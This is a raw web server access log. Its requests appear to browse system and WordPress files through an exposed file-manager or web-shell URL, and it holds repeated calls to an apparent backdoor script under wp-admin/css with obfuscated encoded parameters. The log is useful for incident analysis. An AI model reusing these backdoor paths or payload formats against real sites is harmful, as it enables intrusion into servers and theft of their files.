74.7.227.128 - - [06/Nov/2025:01:34:09 +0700] "GET /shopbrand1093690126?fileloc=//lib64/libpcscspy.so.0&path=//lib64 HTTP/2" 200 9368 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:34:12 +0700] "GET /shopbrand1093604023?fileloc=//lib64/libnewt.so.0.52&path=//lib64 HTTP/2" 200 39708 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:34:18 +0700] "GET /shopbrand1093690126?fileloc=//lib64/libMagickWand-6.Q16.so.6.0.0&path=//lib64 HTTP/2" 200 346744 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:34:24 +0700] "GET /shopbrand1093762447?path=//lib64/ImageMagick-6.9.10/modules-Q16 HTTP/2" 200 2847 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [06/Nov/2025:01:32:24 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323337313134342p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336373534342q6630383666306235663130626364316532336234313163303238633966393637222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [06/Nov/2025:01:34:27 +0700] "GET /shopbrand1093690126?fileloc=//lib64/libexif.so.12&path=//lib64 HTTP/2" 200 78192 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:34:30 +0700] "GET /shopbrand1093690126?fileloc=//lib64/libfftw3.so.3&path=//lib64 HTTP/2" 200 552206 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:34:37 +0700] "GET /shopbrand1093690126?fileloc=//lib64/libxcb-shape.so&path=//lib64 HTTP/2" 200 6794 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:34:40 +0700] "GET /shopbrand1093604023?fileloc=//lib64/libvpx.so.1&path=//lib64 HTTP/2" 200 478276 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [06/Nov/2025:01:32:46 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323337313136362p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336373536362q3964316438303030326563646464376133353934366136353566333730333762222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [06/Nov/2025:01:34:47 +0700] "GET /shopbrand1093690126?fileloc=//lib64/libgmodule-2.0.so.0.5600.1&path=//lib64 HTTP/2" 200 8051 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:34:51 +0700] "GET /shopbrand1093604023?fileloc=//lib64/libpci.so.3&path=//lib64 HTTP/2" 200 26024 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:34:57 +0700] "GET /shopbrand1093690126?fileloc=//lib64/libply-boot-client.so.2&path=//lib64 HTTP/2" 200 9973 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:35:00 +0700] "GET /shopbrand1093604023?fileloc=//lib64/libdrm_radeon.so.1&path=//lib64 HTTP/2" 200 22612 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:35:06 +0700] "GET /shopbrand1093604023?fileloc=//lib64/libxcb-present.so.0&path=//lib64 HTTP/2" 200 6353 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [06/Nov/2025:01:33:08 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323337313138382p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336373538382q3364666666306336323935643262373565633634356137376635323466316462222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [06/Nov/2025:01:35:09 +0700] "GET /shopbrand1093604023?fileloc=//lib64/libOpenIPMIpthread.so.0.0.1&path=//lib64 HTTP/2" 200 16363 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:35:16 +0700] "GET /shopbrand1093690126?fileloc=//lib64/libc-client.so.2007&path=//lib64 HTTP/2" 200 439114 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:35:21 +0700] "GET /shopbrand1093690126?fileloc=//lib64/libjson-c.so.2.0.1&path=//lib64 HTTP/2" 200 20511 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:35:27 +0700] "GET /shopbrand1093604023?fileloc=//lib64/libBrokenLocale.a&path=//lib64 HTTP/2" 200 3017 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:35:30 +0700] "GET /shopbrand1093690126?fileloc=//lib64/libslapi-2.4.so.2&path=//lib64 HTTP/2" 200 51122 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [06/Nov/2025:01:33:30 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323337313231302p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336373631302q6662623866383239333461303130303963323263303165373562383064386462222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [06/Nov/2025:01:35:37 +0700] "GET /shopbrand1093604023?fileloc=//lib64/libenchant.so.1.6.0&path=//lib64 HTTP/2" 200 20699 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:35:41 +0700] "GET /shopbrand1093604023?fileloc=//lib64/libxcb-xvmc.so&path=//lib64 HTTP/2" 200 7156 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:35:48 +0700] "GET /shopbrand1093690126?fileloc=//lib64/libsystemd-daemon.so.0.0.12&path=//lib64 HTTP/2" 200 15339 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:35:52 +0700] "GET /shopbrand1093690126?fileloc=//lib64/libnuma.so.1.0.0&path=//lib64 HTTP/2" 200 22491 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [06/Nov/2025:01:33:53 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323337313233332p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336373633332q6466653061363261313932613465346238623635316438366438663061353264222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [06/Nov/2025:01:35:58 +0700] "GET /shopbrand1093604023?fileloc=//lib64/libbz2.so.1&path=//lib64 HTTP/2" 200 29810 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:36:01 +0700] "GET /shopbrand1093690126?fileloc=//lib64/libicuio.so.50.2&path=//lib64 HTTP/2" 200 23343 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:36:08 +0700] "GET /shopbrand1093690126?fileloc=//lib64/liblve.so.0&path=//lib64 HTTP/2" 200 43749 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:36:13 +0700] "GET /shopbrand1093604023?fileloc=//lib64/libsodium.so.23.3.0&path=//lib64 HTTP/2" 200 140814 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [06/Nov/2025:01:34:15 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323337313235352p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336373635352q3736353537366264323364666165306362633130643833353635613434363333222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [06/Nov/2025:01:36:20 +0700] "GET /shopbrand1093604023?fileloc=//lib64/libpcre.so.1&path=//lib64 HTTP/2" 200 140791 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:36:25 +0700] "GET /shopbrand1093690126?path=//lib64/ImageMagick-6.9.10 HTTP/2" 200 2831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:36:31 +0700] "GET /shopbrand1093604023?path=//lib64/ImageMagick-6.9.10 HTTP/2" 200 2831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:36:34 +0700] "GET /shopbrand1093707564?path=//lib64/ImageMagick-6.9.10/modules-Q16/coders HTTP/2" 200 8586 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [06/Nov/2025:01:34:37 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323337313237372p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336373637372q6463656363303735346562393933343732396532396461663034306131333534222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [06/Nov/2025:01:36:41 +0700] "GET /shopbrand1093762447?path=//lib64/ImageMagick-6.9.10/config-Q16 HTTP/2" 200 2802 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:36:45 +0700] "GET /shopbrand1093657736?path=//lib64/ImageMagick-6.9.10/modules-Q16 HTTP/2" 200 2847 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:36:50 +0700] "GET /shopbrand1093762447?path=//lib64/ImageMagick-6.9.10/modules-Q16/coders HTTP/2" 200 8571 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:36:55 +0700] "GET /shopbrand1093571503?path=//lib64/ImageMagick-6.9.10/modules-Q16 HTTP/2" 200 2847 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [06/Nov/2025:01:35:00 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323337313330302p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336373730302q3739616639366338643331613931366366646530343462313037303463356139222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [06/Nov/2025:01:37:01 +0700] "GET /shopbrand1093707564?fileloc=//lib64/ImageMagick-6.9.10/modules-Q16/coders/mpeg.la&path=//lib64/ImageMagick-6.9.10/modules-Q16/coders HTTP/2" 200 3047 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
57.141.14.83 - - [06/Nov/2025:01:37:04 +0700] "GET /shopbrand1137353545?kg=1134876110 HTTP/2" 200 62523 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
74.7.227.128 - - [06/Nov/2025:01:37:04 +0700] "GET /shopbrand1093707564?fileloc=//lib64/ImageMagick-6.9.10/modules-Q16/coders/cut.so&path=//lib64/ImageMagick-6.9.10/modules-Q16/coders HTTP/2" 200 8799 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:37:11 +0700] "GET /shopbrand1093571503?path=//lib64/ImageMagick-6.9.10/config-Q16 HTTP/2" 200 2837 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:37:14 +0700] "GET /shopbrand1093707564?fileloc=//lib64/ImageMagick-6.9.10/modules-Q16/coders/pcx.so&path=//lib64/ImageMagick-6.9.10/modules-Q16/coders HTTP/2" 200 11759 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:37:21 +0700] "GET /shopbrand1093762447?fileloc=//lib64/ImageMagick-6.9.10/modules-Q16/coders/art.so&path=//lib64/ImageMagick-6.9.10/modules-Q16/coders HTTP/2" 200 7442 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [06/Nov/2025:01:35:22 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323337313332322p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336373732322q3961653336646133353862366432313738633565613164613037613563343036222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [06/Nov/2025:01:37:25 +0700] "GET /shopbrand1093657736?path=//lib64/ImageMagick-6.9.10/modules-Q16/coders HTTP/2" 200 8597 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:37:31 +0700] "GET /shopbrand1093604023?path=//lib64/ImageMagick-6.9.10/modules-Q16 HTTP/2" 200 2847 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:37:35 +0700] "GET /shopbrand1093657736?path=//lib64/ImageMagick-6.9.10/config-Q16 HTTP/2" 200 2837 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:37:41 +0700] "GET /shopbrand1093604023?path=//lib64/ImageMagick-6.9.10/config-Q16 HTTP/2" 200 2837 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [06/Nov/2025:01:35:45 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323337313334352p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336373734352q6266666331616131343233636562363339343961366336653965613532393830222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [06/Nov/2025:01:37:46 +0700] "GET /shopbrand1093690126?path=//lib64/ImageMagick-6.9.10/config-Q16 HTTP/2" 200 2837 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:37:49 +0700] "GET /shopbrand1093657736?fileloc=//lib64/ImageMagick-6.9.10/modules-Q16/coders/pcl.so&path=//lib64/ImageMagick-6.9.10/modules-Q16/coders HTTP/2" 200 10652 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:37:55 +0700] "GET /shopbrand1093571503?path=//lib64/ImageMagick-6.9.10/modules-Q16/coders HTTP/2" 200 8671 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:37:59 +0700] "GET /shopbrand1093604023?path=//lib64/ImageMagick-6.9.10/modules-Q16/coders HTTP/2" 200 9180 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:38:05 +0700] "GET /shopbrand1093690126?path=//lib64/ImageMagick-6.9.10/modules-Q16 HTTP/2" 200 2847 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [06/Nov/2025:01:36:07 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323337313336372p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336373736372q6631643135383761626665623361333063613730643037633066383363393539222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [06/Nov/2025:01:38:08 +0700] "GET /shopbrand1093488824?path=//lib/grub HTTP/2" 200 2782 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:38:14 +0700] "GET /shopbrand1093488824?path=//proc/lve HTTP/2" 200 2803 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:38:18 +0700] "GET /shopbrand1093643365?path=/home/distri20/public_html/wp-includes HTTP/2" 200 11499 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:38:21 +0700] "GET /shopbrand1093488824?path=//etc/skel HTTP/2" 200 2879 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:38:28 +0700] "GET /shopbrand1093604023?fileloc=//lib64/ImageMagick-6.9.10/modules-Q16/coders/magick.la&path=//lib64/ImageMagick-6.9.10/modules-Q16/coders HTTP/2" 200 3049 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [06/Nov/2025:01:36:29 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323337313338392p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336373738392q3962306161373430306466393835383531316162393564353732376465623562222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [06/Nov/2025:01:38:31 +0700] "GET /shopbrand1093604023?fileloc=//lib64/ImageMagick-6.9.10/modules-Q16/coders/ps2.so&path=//lib64/ImageMagick-6.9.10/modules-Q16/coders HTTP/2" 200 12655 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:38:37 +0700] "GET /shopbrand1093550036?path=/home/distri20/public_html/wp-includes HTTP/2" 200 11546 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:38:42 +0700] "GET /shopbrand1093814625?path=/home/distri20/public_html/wp-includes HTTP/2" 200 11499 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:38:44 +0700] "GET /shopbrand1093643365?fileloc=/home/distri20/public_html/wp-includes/class-wp-http-streams.php&path=/home/distri20/public_html/wp-includes HTTP/2" 200 7507 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:38:48 +0700] "GET /shopbrand1093643365?fileloc=/home/distri20/public_html/wp-includes/class-wp-widget.php&path=/home/distri20/public_html/wp-includes HTTP/2" 200 7193 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:01:38:51 +0700] "GET /shopbrand1093643365?fileloc=/home/distri20/public_html/wp-includes/class-wp-simplepie-file.php&path=/home/distri20/public_html/wp-includes HTTP/2" 200 3837 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [06/Nov/2025:01:36:51 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323337313431312p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336373831312q3730326437336463373131623632333432353838636535663036376333646161222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
